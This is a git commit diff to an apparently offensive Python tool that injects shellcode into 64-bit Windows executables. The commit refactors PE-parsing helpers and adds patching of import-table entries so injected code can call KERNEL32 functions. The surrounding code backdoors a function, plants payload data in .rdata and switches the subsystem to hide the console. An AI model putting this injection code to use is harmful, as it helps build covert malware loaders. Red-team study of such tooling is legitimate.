feature: patch missing iat (+refactor: remove ExeHost)

This commit is contained in:
Dobin
2024-05-06 11:00:50 +01:00
parent 2c9a20d822
commit b8c834ac56
8 changed files with 200 additions and 183 deletions
+3 -11
View File
@@ -21,7 +21,6 @@ from phases.injector import verify_injected_exe
from helper import run_process_checkret, run_exe
from model.project import prepare_project
from pe.superpe import SuperPe
from model.exehost import ExeHost
import pe.dllresolver
@@ -87,22 +86,13 @@ def project(name):
has_rodata_section = superpe.has_rodata_section()
if has_rodata_section:
exehost = ExeHost(project.settings.inject_exe_in)
exehost.init()
data_sect_largest_gap_size = exehost.get_rdata_relocmanager().find_largest_gap()
superpe.get_rdata_relocmanager().find_largest_gap()
unresolved_dlls = pe.dllresolver.unresolved_dlls(superpe)
project_dir = os.path.dirname(os.path.abspath(project.settings.inject_exe_out))
log_files = get_logfiles(project.settings.main_dir)
exes = list_files_and_sizes(PATH_EXES, prepend=PATH_EXES)
exes += list_files_and_sizes(PATH_EXES_MORE, prepend=PATH_EXES_MORE)
#for file in
# exes.append(PATH_EXES + file)
#for file in os.listdir(PATH_EXES_MORE):
# exes.append(PATH_EXES_MORE + file)
shellcodes = list_files_and_sizes(PATH_SHELLCODES)
function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
@@ -135,6 +125,7 @@ def project(name):
has_remote=has_remote,
)
def list_files_and_sizes(directory, prepend=""):
# List all files in the directory and get their sizes
files_and_sizes = []
@@ -148,6 +139,7 @@ def list_files_and_sizes(directory, prepend=""):
})
return files_and_sizes
@views_project.route("/project_add", methods=['POST', 'GET'])
def add_project():
if request.method == 'POST':
+22 -7
View File
@@ -1,5 +1,9 @@
from typing import Dict, List
import logging
import pefile
from model.defs import *
from pe.superpe import SuperPe, PeSection
logger = logging.getLogger("Carrier")
@@ -13,22 +17,33 @@ class IatRequest():
class DataReuseEntry():
def __init__(self, string_ref: str):
self.string_ref = string_ref # "$SG72513"
self.string_ref: str = string_ref # "$SG72513"
self.register = "" # "rcx"
self.randbytes = b"" # placeholder
self.data = b''
self.addr = 0
self.register: str = "" # "rcx"
self.randbytes: bytes = b"" # placeholder
self.data: bytes = b''
self.addr: int = 0
class Carrier():
def __init__(self):
def __init__(self, exe_file: str):
self.iat_requests: List[IatRequest] = []
self.reusedata_fixups: List[DataReuseEntry] = []
self.exe_filepath: str = exe_file
self.superpe: SuperPe = None
def init(self):
pass
self.superpe = SuperPe(self.exe_filepath)
def get_unresolved_iat(self):
"""Returns a list of IAT entries not available in the PE file"""
functions = []
for iat in self.iat_requests:
if self.superpe.get_vaddr_of_iatentry(iat.name) == None:
functions.append(iat.name)
return functions
# IAT
-111
View File
@@ -1,111 +0,0 @@
from typing import Dict, List
import logging
import pefile
from intervaltree import Interval, IntervalTree
from model.defs import *
import pe.pehelper as pehelper
from pe.superpe import SuperPe, PeSection
from model.carrier import Carrier
from model.rangemanager import RangeManager
logger = logging.getLogger("ExeHost")
class ExeHost():
def __init__(self, filepath: FilePath):
self.filepath: FilePath = filepath
# we keep this open
# And modify the EXE through this at the end
self.superpe: SuperPe = None
self.iat: Dict[str, IatEntry] = {}
self.base_relocs: List[PeRelocEntry] = []
self.base_reloc_ranges: RangeManager = None
self.image_base: int = 0
self.dynamic_base: bool = False
self.code_section = None
self.rwx_section = None
def init(self):
logger.info("--[ Analyzing: {}".format(self.filepath))
self.superpe = SuperPe(self.filepath)
if not self.superpe.is_64():
logger.warn("Binary is not 64bit: {}".format(self.filepath))
return
#raise Exception("Binary is not 64bit: {}".format(self.filepath))
# image base
self.image_base = self.superpe.pe.OPTIONAL_HEADER.ImageBase
# dynamic base / ASLR
if self.superpe.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']:
self.dynamic_base = True
else:
self.dynamic_base = False
# code section we inject to, usually .text
self.code_section = self.superpe.get_code_section()
logger.info("---[ Injectable: Chosen code section: {} at 0x{:X} size: {}".format(
self.code_section.Name.decode().rstrip('\x00'),
self.code_section.VirtualAddress,
self.code_section.Misc_VirtualSize))
# if there is a rwx section, None otherwise
self.rwx_section = self.superpe.get_rwx_section()
# relocs
self.base_relocs = self.superpe.get_base_relocs()
# IAT
self.iat = self.superpe.get_iat_entries()
def get_vaddr_of_iatentry(self, func_name: str) -> int:
for dll_name in self.iat:
for entry in self.iat[dll_name]:
if entry.func_name == func_name:
return entry.iat_vaddr
return None
def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]:
section: PeSection = self.superpe.get_section_by_name(section_name)
if section is None:
return []
ret = []
#return [reloc for reloc in self.base_relocs if reloc.base_rva == section.virt_addr]
for reloc in self.base_relocs:
reloc_addr = reloc.rva
if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size:
ret.append(reloc)
return ret
def get_rdata_relocmanager(self) -> RangeManager:
section = self.superpe.get_section_by_name(".rdata")
relocs = self.get_relocations_for_section(".rdata")
#print("Relocs for .rdata: {} of {}".format(len(relocs), len(self.base_relocs)))
rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size)
for reloc in relocs:
# Reloc destination is probably 8 bytes
# But i add another 8 to skip over small holes (common in .rdata)
rm.add_range(reloc.rva, reloc.rva + 8 + 8)
rm.merge_overlaps()
return rm
def has_all_carrier_functions(self, carrier: Carrier):
is_ok = True
for iat_entry in carrier.iat_requests:
addr = self.get_vaddr_of_iatentry(iat_entry.name)
if addr == 0:
logging.info("---( Function not available as import: {}".format(iat_entry.name))
is_ok = False
return is_ok
+1 -4
View File
@@ -3,7 +3,6 @@ import shutil
from model.defs import *
from model.payload import Payload
from model.exehost import ExeHost
from model.settings import Settings
from model.carrier import Carrier
@@ -23,8 +22,7 @@ class Project():
self.comment: str = ""
self.settings: Settings = settings
self.payload: Payload = Payload(self.settings.payload_path)
self.exe_host: ExeHost = ExeHost(self.settings.inject_exe_in)
self.carrier: Carrier = Carrier()
self.carrier: Carrier = Carrier(self.settings.inject_exe_in)
self.project_dir: str = ""
self.project_exe: str = ""
@@ -32,7 +30,6 @@ class Project():
def init(self):
self.payload.init()
self.exe_host.init()
self.carrier.init()
+128 -17
View File
@@ -4,6 +4,7 @@ import logging
from typing import List, Dict
from model.defs import *
from model.rangemanager import RangeManager
logger = logging.getLogger("superpe")
@@ -61,6 +62,18 @@ class SuperPe():
return False
def get_image_base(self) -> int:
return self.pe.OPTIONAL_HEADER.ImageBase
def is_dynamic_base(self) -> bool:
# dynamic base / ASLR
if self.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']:
return True
else:
return False
## Entrypoint
def get_entrypoint(self) -> int:
@@ -122,7 +135,7 @@ class SuperPe():
def patch_subsystem(self):
if self.pe.OPTIONAL_HEADER.Subsystem != pefile.SUBSYSTEM_TYPE['IMAGE_SUBSYSTEM_WINDOWS_GUI']:
logger.info("EXE is not a GUI application. Patching subsystem to GUI")
logger.info("PE is not a GUI application. Patching subsystem to GUI")
self.pe.OPTIONAL_HEADER.Subsystem = pefile.SUBSYSTEM_TYPE['IMAGE_SUBSYSTEM_WINDOWS_GUI']
@@ -138,22 +151,6 @@ class SuperPe():
reloc_type = pefile.RELOCATION_TYPE[entry.type][0]
base_relocs.append(PeRelocEntry(rva, base_rva, reloc_type))
return base_relocs
def get_iat_entries(self) -> Dict[str, IatEntry]:
iat = {}
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
for imp in entry.imports:
dll_name = entry.dll.decode('utf-8')
if imp.name == None:
continue
imp_name = imp.name.decode('utf-8')
imp_addr = imp.address
if not dll_name in iat:
iat[dll_name] = []
iat[dll_name].append(IatEntry(dll_name, imp_name, imp_addr))
return iat
def getSectionIndexByDataDir(self, dirIndex):
@@ -292,6 +289,120 @@ class SuperPe():
if exp["name"] == dllfunc:
return exp["size"]
return None
## Relocations
def get_rdata_relocmanager(self) -> RangeManager:
section = self.get_section_by_name(".rdata")
relocs = self.get_relocations_for_section(".rdata")
rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size)
for reloc in relocs:
# Reloc destination is probably 8 bytes
# But i add another 8 to skip over small holes (common in .rdata)
rm.add_range(reloc.rva, reloc.rva + 8 + 8)
rm.merge_overlaps()
return rm
def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]:
section: PeSection = self.get_section_by_name(section_name)
ret = []
if section is None:
return ret
for reloc in self.get_base_relocs():
reloc_addr = reloc.rva
if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size:
ret.append(reloc)
return ret
## IAT related
def get_vaddr_of_iatentry(self, func_name: str) -> int:
iat = self.get_iat_entries()
for dll_name in iat:
for entry in iat[dll_name]:
if entry.func_name == func_name:
return entry.iat_vaddr
return None
def get_iat_entries(self) -> Dict[str, IatEntry]:
iat = {}
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
for imp in entry.imports:
dll_name = entry.dll.decode('utf-8')
if imp.name == None:
continue
imp_name = imp.name.decode('utf-8')
imp_addr = imp.address
if not dll_name in iat:
iat[dll_name] = []
iat[dll_name].append(IatEntry(dll_name, imp_name, imp_addr))
return iat
def get_iat_name_for(self, dll_name: str, func_name: str) -> str:
iat = self.get_iat_entries()
for entry in iat[dll_name]:
if len(entry.func_name) >= len(func_name):
return entry.func_name
return None
def get_iat_offset_by_nr(self, dll_name: str, nr: int) -> int:
encoded_dllname = dll_name
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
dllname = entry.dll.decode("ascii").rstrip("\x00").lower()
if dllname != encoded_dllname:
continue
return entry.imports[nr].name_offset
return None
def get_iat_offset_by_name(self, dll_name: str, func_name: str) -> int:
# Iterate over the imported modules and their imported functions
encoded_dllname = dll_name.lower()
encoded_funcname = func_name.lower()
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
dllname = entry.dll.decode("ascii").rstrip("\x00").lower()
if dllname != encoded_dllname:
continue
for imp in entry.imports:
# Check if the current import name matches the one we want to change
funcname = imp.name.decode("ascii").rstrip("\x00").lower()
if funcname == encoded_funcname:
return imp.name_offset
break
return None
def patch_iat_entry(self, dll_name: str, func_name: str, new_func_name: str):
offset = self.get_iat_offset_by_name(dll_name, func_name)
if offset is None:
raise Exception(f"Import {func_name} not found.")
# Change the import name
# Here we need to ensure the new name fits within the space allocated to the old name
if len(new_func_name) > len(func_name):
raise ValueError("New import name is longer than the original name.")
# Pad the new name with null bytes if it's shorter
new_name_bytes = new_func_name.encode("ascii") + b'\x00' * (len(func_name) - len(new_func_name))
# Overwrite the name in the file data
logger.info(" Patch IAT entry at offset 0x{:X} from {} to {}".format(
offset, func_name, new_name_bytes.decode()))
self.pe.set_bytes_at_offset(offset, new_name_bytes)
#res = self.get_iat_offset_by_name(dll_name, new_func_name)
#logger.info("-> RES: {}".format(res))
## Helpers
-1
View File
@@ -10,7 +10,6 @@ from observer import observer
from model import *
from phases.masmshc import masm_shc, Params
from model.carrier import Carrier
from model.exehost import ExeHost
from phases.asmparser import parse_asm_file
logger = logging.getLogger("Compiler")
+32 -18
View File
@@ -2,10 +2,10 @@ from helper import *
import logging
import time
import logging
from typing import Dict, List
from model.carrier import Carrier, DataReuseEntry
from pe.pehelper import *
from model.exehost import *
from observer import observer
from pe.derbackdoorer import FunctionBackdoorer
from pe.superpe import SuperPe
@@ -34,15 +34,30 @@ def inject_exe(
# And check if it fits into the target code section
main_shc = file_readall_binary(main_shc_path)
shellcode_len = len(main_shc)
if shellcode_len + 128 > project.exe_host.code_section.Misc_VirtualSize:
code_sect_size = project.carrier.superpe.get_code_section().Misc_VirtualSize
if shellcode_len + 128 > code_sect_size:
raise Exception("Error: Shellcode {}+128 too small for target code section {}".format(
shellcode_len, project.exe_host.code_section.Misc_VirtualSize
shellcode_len, code_sect_size
))
# superpe is a representation of the exe file. We gonna modify it, and save it at the end.
superpe = SuperPe(exe_in)
function_backdoorer = FunctionBackdoorer(superpe)
# Patch IAT if necessary
if source_style == FunctionInvokeStyle.iat_reuse:
for iatRequest in project.carrier.get_all_iat_requests():
iat_name = superpe.get_iat_name_for("KERNEL32.dll", iatRequest.name)
superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name)
#iat_name_a = superpe.get_iat_name_for("KERNEL32.dll", "GetEnvironmentVariableW")
#iat_name_b = superpe.get_iat_name_for("KERNEL32.dll", "VirtualProtect")
#logger.info("Using: {} and {}".format(iat_name_a, iat_name_b))
#superpe.patch_iat_entry("KERNEL32.dll", iat_name_a, "GetEnvironmentVariableW")
#superpe.patch_iat_entry("KERNEL32.dll", iat_name_b, "VirtualProtect")
superpe.pe.parse_data_directories()
shellcode_offset: int = 0 # file offset
if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
# Special case. put it at the beginning of the exported DLL function
@@ -109,8 +124,8 @@ def inject_exe(
function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)
if source_style == FunctionInvokeStyle.iat_reuse:
injected_fix_iat(superpe, project.carrier, project.exe_host)
injected_fix_data(superpe, project.carrier, project.exe_host)
injected_fix_iat(superpe, project.carrier)
injected_fix_data(superpe, project.carrier)
# changes from console to UI (no console window) if necessary
superpe.patch_subsystem()
@@ -129,31 +144,30 @@ def inject_exe(
# observer.add_code_file("exe_extracted_jmp", jmp_code)
def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
def injected_fix_iat(superpe: SuperPe, carrier: Carrier):
"""replace IAT-placeholders in shellcode with call's to the IAT"""
code = superpe.get_code_section_data()
for iatRequest in carrier.get_all_iat_requests():
if not iatRequest.placeholder in code:
raise Exception("IatResolve ID {} not found, abort".format(iatRequest.placeholder))
destination_virtual_address = exe_host.get_vaddr_of_iatentry(iatRequest.name)
offset_from_code = code.index(iatRequest.placeholder)
# Note that the SuperPe may already have been patched for new IAT imports
destination_virtual_address = superpe.get_vaddr_of_iatentry(iatRequest.name)
if destination_virtual_address == None:
raise Exception("IatResolve: Function {} not found".format(iatRequest.name))
offset_from_code = code.index(iatRequest.placeholder)
instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_section.VirtualAddress
instruction_virtual_address = offset_from_code + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X}".format(
iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
))
jmp = assemble_relative_call(
instruction_virtual_address, destination_virtual_address
)
jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address)
code = code.replace(iatRequest.placeholder, jmp)
superpe.write_code_section_data(code)
def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
def injected_fix_data(superpe: SuperPe, carrier: Carrier):
"""Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA"""
# Insert my data into the .rdata section.
# Chose and save each datareuse_fixup's addres.
@@ -163,11 +177,11 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
return
# Put stuff into .rdata section in the PE
peSection = exe_host.superpe.get_section_by_name(".rdata")
peSection = carrier.superpe.get_section_by_name(".rdata")
if peSection == None:
raise Exception("No .rdata section found, abort")
rm = exe_host.get_rdata_relocmanager()
rm = carrier.superpe.get_rdata_relocmanager()
if True: # FIXME this is a hack which is sometimes necessary
sect_data_copy = peSection.pefile_section.get_data()
@@ -190,7 +204,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
rm.add_range(hole[0], hole[1]) # mark it as used
var_data = datareuse_fixup.data
superpe.pe.set_bytes_at_offset(fixup_offset_rdata, var_data)
datareuse_fixup.addr = fixup_offset_rdata + peSection.virt_addr + exe_host.image_base - peSection.raw_addr
datareuse_fixup.addr = fixup_offset_rdata + peSection.virt_addr + carrier.superpe.get_image_base() - peSection.raw_addr
logging.info(" Add data to .rdata at 0x{:X} (off: {}): {}".format(
datareuse_fixup.addr, fixup_offset_rdata, var_data.decode('utf-16le')))
fixup_offset_rdata += len(var_data) + 8
@@ -204,7 +218,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
datareuse_fixup.randbytes))
offset_from_datasection = code.index(datareuse_fixup.randbytes)
instruction_virtual_address = offset_from_datasection + exe_host.image_base + exe_host.code_section.VirtualAddress
instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
destination_virtual_address = datareuse_fixup.addr
logger.info(" Replace {} at VA 0x{:X} with LEA {} .rdata 0x{:X}".format(
datareuse_fixup.randbytes.hex(), instruction_virtual_address, datareuse_fixup.register, destination_virtual_address
+14 -14
View File
@@ -135,8 +135,9 @@ def start_real(settings: Settings):
# Load our input
project = Project(settings)
project.init()
# check if 64 bit
if not project.exe_host.superpe.is_64():
if not project.carrier.superpe.is_64():
raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in))
logger.warning("--I FunctionInvokeStyle: {} Inject Mode: {} DecoderStyle: {}".format(
@@ -157,12 +158,11 @@ def start_real(settings: Settings):
# we have the required IAT entries in carrier.iat_requests
# Check if all are available, or abort (early check)
if settings.source_style == FunctionInvokeStyle.iat_reuse:
functions = []
for iat in project.carrier.iat_requests:
if project.exe_host.get_vaddr_of_iatentry(iat.name) == None:
functions.append(iat.name)
if len(functions) > 0:
raise Exception("IAT entry not found: {}".format(", ".join(functions)))
functions = project.carrier.get_unresolved_iat()
if len(functions) != 0:
#raise Exception("IAT entry not found: {}".format(", ".join(functions)))
logger.warn("IAT entry not found: {}".format(", ".join(functions)))
pass
# Assemble: Assemble .asm to .shc (ASM -> SHC)
if settings.generate_shc_from_asm:
@@ -180,13 +180,13 @@ def start_real(settings: Settings):
decoder_style = settings.decoder_style)
# RWX Injection (optional): obfuscate loader+payload
if project.exe_host.rwx_section != None:
logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
project.exe_host.rwx_section.Name.decode().rstrip('\x00')
))
obfuscate_shc_loader(settings.main_shc_path, settings.main_shc_path + ".sgn")
observer.add_code_file("payload_sgn", file_readall_binary(settings.main_shc_path + ".sgn"))
shutil.move(settings.main_shc_path + ".sgn", settings.main_shc_path)
#if project.exe_host.rwx_section != None:
# logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
# project.exe_host.rwx_section.Name.decode().rstrip('\x00')
# ))
# obfuscate_shc_loader(settings.main_shc_path, settings.main_shc_path + ".sgn")
# observer.add_code_file("payload_sgn", file_readall_binary(settings.main_shc_path + ".sgn"))
# shutil.move(settings.main_shc_path + ".sgn", settings.main_shc_path)
# inject merged loader into an exe
phases.injector.inject_exe(settings.main_shc_path, settings, project)